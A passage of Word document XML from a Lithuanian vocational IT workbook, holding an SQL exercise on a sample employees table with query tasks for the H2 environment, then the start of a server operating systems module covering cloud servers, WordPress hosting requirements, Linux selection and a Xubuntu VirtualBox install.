      <w:bookmarkStart w:id="168" w:name="_Toc13833420"/>
      <w:bookmarkStart w:id="169" w:name="_Toc14392451"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Mokymosi rezultatas. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Kurti duomenis duomenų baz</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ėje valdančią programinę įrangą</w:t>
      </w:r>
      <w:bookmarkEnd w:id="166"/>
      <w:bookmarkEnd w:id="167"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="168"/>
      <w:bookmarkEnd w:id="169"/>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PANAUDOKITE TINKAMAS SĄLYGŲ IR GRUPAVIMO SQL KOMANDAS</w:t>
      </w:r>
      <w:r w:rsidR="004E3964">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Duota: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="720" w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>darbuotojai.sq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DROP TABLE IF EXISTS `DARBUOTOJAI`;</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CREATE TABLE `DARBUOTOJAI` (</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ASMENSKODAS` bigint(20)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VARDAS` varchar(20)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PAVARDE` varchar(30)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DIRBANUO` date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GIMIMOMETAI` date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PAREIGOS` varchar(30)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SKYRIAUSPAVADINIMAS` varchar(30)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 xml:space="preserve">  `PROJEKTONUMERIS` int(11) DEFAULT NULL</w:t>
      </w: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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00"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p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68"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lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D547B4">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>INSERT INTO `DARBUOTOJAI` VALUES (32541036850,'Mantas','Bananas','2010-08-01','1999-04-21','Programuotojas','Amzinai atostogose',2),(35206891026,'Justas','Zmogauskas','2008-02-04','1990-08-22','Programuotojas','Daug dirbantys',2),(35261458702,'Petrius','Kanusauskas','1996-04-18','1976-10-11','Programuotojas','Mazai dirbantieji',1),(36510284592,'Antanas','Smeliauskas','2006-05-04','1986-10-14','Testuotojas','Mazai dirbantys',1),(38962504820,'Zilvinas','Morkinis','2012-11-20','1988-06-15','Programuotojas','Mazai dirbantys',3),(39520146780,'Jonas','Jonauskas','1985-05-25','1960-05-04','Testuotojas','Daug dirbantieji',3),(42056548920,'Toma','Antanaitiene','2004-09-11','1979-05-11','Testuotoja','Daug dirbantys',2),(44205967260,'Juste','Karnisoviene','1988-09-06','1950-07-30','Projektu vadove','Vadovybe',1),(45289645130,'Zinaida','Zidane','1999-04-18','1980-04-01','Programuotoja','Amzinai atostogose',2),(49853148205,'Toma','Zidane','2010-10-06','1990-07-14','Projektu vadove','Vadovybe',2);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Atlikite užklausas H2 aplinkoje importuotoje DB (Naudojamos priemonės/aplinkos - H2 aplinka)</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>:</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ą (asmens kodą, vardą ir pavardę) iš lentelės DARBUOTOJAI, kurie būtų gimę 1988m. birželio 15d.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Išrinkite visus duomenis apie darbuotojus iš lentelės DARBUOTOJAI, kurie yra gimę iki 1988m. liepos 29d.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Išrinkite duomenis apie darbuotojus (dirba nuo kada ir gimimo metus) iš lentelės DARBUOTOJAI, kurie būtų įsidarbinę nuo 2000m. spalio 30d. iki 2012m. lapkričio 11d.</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us (vardą, skyrių ir projekto numerį) iš lentelės DARBUOTOJAI kurie dirba 2 ir 3 projektuose. (Panaudoti IN operatorių).</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vardą, pavardę ir asmens kodą) apie visas moteris iš lentelės DARBUOTOJAI (panaudojant operatorių LIKE).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Išrinkite visus duomenis apie visus darbuotojus iš lentelės DARBUOTOJAI, kurie yra gimę 12 dieną (panaudojant operatorių LIKE).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Išrinkite visus duomenis iš lentelės DARBUOTOJAI, kad skyriaus pavadinime 3 raidė būtų ‘u’.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Išrinkite visus darbuotojus iš lentelės DARBUOTOJAI, kuriems nepaskirtos jokios pareigos.</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ą (vardą, pavardę, nuo kada dirba ir pareigas) kad tenkintų sąlygas: (dirba nuo 2010-08-01 ir jų pareigos yra Programuotojas).</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us (vardą, pavardę, skyriaus pavadinimą ir projekto numerį)  iš lentelės DARBUOTOJAI su sąlyga, kad jie būtų iš Mažai dirbantys skyriaus arba 1 projekto.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Išrinkite visus darbuotojų vardus, išskyrus tuos, kurių vardai prasideda raide ‚J’ .</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vardą, dirba nuo kada ir gimimo metus) iš lentelės „DARBUOTOJAI” apie visus darbuotojus, tik ne tuos, kurie įsidarbino nuo 2009 m. spalio 30 d. iki 2012 m. lapkričio 11d.</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us (vardą, pavardę ir gimimo metus) iš lentelės DARBUOTOJAI ir išrikiuokite visus duomenis nuo seniausio žmogaus iki jauniausio.</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darbuotojus (vardą, pavardę ir gimimo metus) iš lentelės DARBUOTOJAI ir išrikiuokite visus duomenis nuo jauniausio žmogaus iki seniausio.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Išrinkite iš lentelės DARBUOTOJAI projekto numerį, kuris būtų minimalus skaičius ir maksimalus skaičius.</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is apie projektą ir kiek tame projekte yra priskirta žmonių iš lentelės DARBUOTOJAI (projekto numeris ir skaičius kiek dalyvauja žmonių).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Išrinkite duomens (projekto numeris, pareigos, skaičius) iš lentėlės DARBUOTOJAI kiek dirba programuotojų kiekvienam projekte?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>#17 punkto užklausą pataisykite taip, kad rodytų tik tuos projektus, kur dirba bent 3 darbuotojai.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="170" w:name="_Toc10443978"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="004E3964" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720" w:right="282"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="171" w:name="_Toc13095527"/>
      <w:bookmarkStart w:id="172" w:name="_Toc13833421"/>
      <w:bookmarkStart w:id="173" w:name="_Toc14392452"/>
      <w:r w:rsidRPr="004E3964">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Modulis „</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="004E3964">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>rogramavimo aplinkos ir kūrimo proceso valdymas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> (programinės įrangos testuotojo)</w:t>
      </w:r>
      <w:r w:rsidRPr="004E3964">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:bookmarkEnd w:id="170"/>
      <w:bookmarkEnd w:id="171"/>
      <w:bookmarkEnd w:id="172"/>
      <w:bookmarkEnd w:id="173"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720" w:right="282"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:kern w:val="36"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:bookmarkStart w:id="174" w:name="_Toc10443979"/>
      <w:bookmarkStart w:id="175" w:name="_Toc13095528"/>
      <w:bookmarkStart w:id="176" w:name="_Toc13833422"/>
      <w:bookmarkStart w:id="177" w:name="_Toc14392453"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Kompetencija. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Naudoti tarnybi</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>nių stočių operacines sistemas</w:t>
      </w:r>
      <w:bookmarkEnd w:id="174"/>
      <w:bookmarkEnd w:id="175"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="176"/>
      <w:bookmarkEnd w:id="177"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="178" w:name="_Toc10443980"/>
      <w:bookmarkStart w:id="179" w:name="_Toc13095529"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="180" w:name="_Hlk14109876"/>
      <w:bookmarkStart w:id="181" w:name="_Toc13833423"/>
      <w:bookmarkStart w:id="182" w:name="_Toc14392454"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Mokymosi rezultatas. </w:t>
      </w:r>
      <w:bookmarkEnd w:id="180"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Administruoti skaitmenines bylas bei tarnybinės stoties vartotojus naudojant tos tarnybinės stoties operacinę sistemą</w:t>
      </w:r>
      <w:bookmarkEnd w:id="178"/>
      <w:bookmarkEnd w:id="179"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="181"/>
      <w:bookmarkEnd w:id="182"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">1 užduotis.  </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>DEBESŲ KOMPIUTERIJA</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surasti informaciją apie debesų kompiuteriją, atsakyti kas yra VDS serveris. Patikrinti, kaip serverių resursai įtakoja serverio kainą.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Naudojamos priemonės (aplinkos): interneto naršyklė (Firefox, Opera ir pan.).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Veiksmų eiga (žingsniai), kaip bus siekiama rezultato: naudojant https://www.google.lt informacijos paieškos įrankį ieškoma tikslinė informacija, raktiniai žodžiai: debesų kompiuterija, VDS serveris.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68"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xml:space="preserve"> SERVERIO IŠTEKLIAI</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https://www.google.lt informacijos paieškos įrankį surasti informaciją apie WordPress turinio valdymo sistemos reikalavimus serveriui, parinkti serverį, kuris galės talpinti WordPress turinio valdymo sistemą.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Naudojamos priemonės (aplinkos): interneto naršyklė (Firefox, Opera ir pan.).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Veiksmų eiga (žingsniai), kaip bus siekiama rezultato: naudojant https://www.google.lt informacijos paieškos įrankį ieškoma tikslinė informacija, raktiniai žodžiai: WordPress requirements. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>3 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> LINUX OS PARINKIMAS</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https://distrochooser.de/en parinkti sau tinkamą Linux OS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Naudojamos priemonės (aplinkos): interneto naršyklė (Firefox, Opera ir pan.).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Veiksmų eiga (žingsniai), kaip bus siekiama rezultato: tinklapyje https://distrochooser.de/en atlikti testą ir nustatyti kokia Linux OS Jums tinka geriausiai.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68"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xml:space="preserve">  XUBUNTU OS DIEGIMAS VIRTUALIOJE APLINKOJE</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VirtualBox įrankį ir Xubuntu OS iso atvaizdą virtualizuoti Linux OS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Naudojamos priemonės (aplinkos): Windows 7, VirtualBox.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
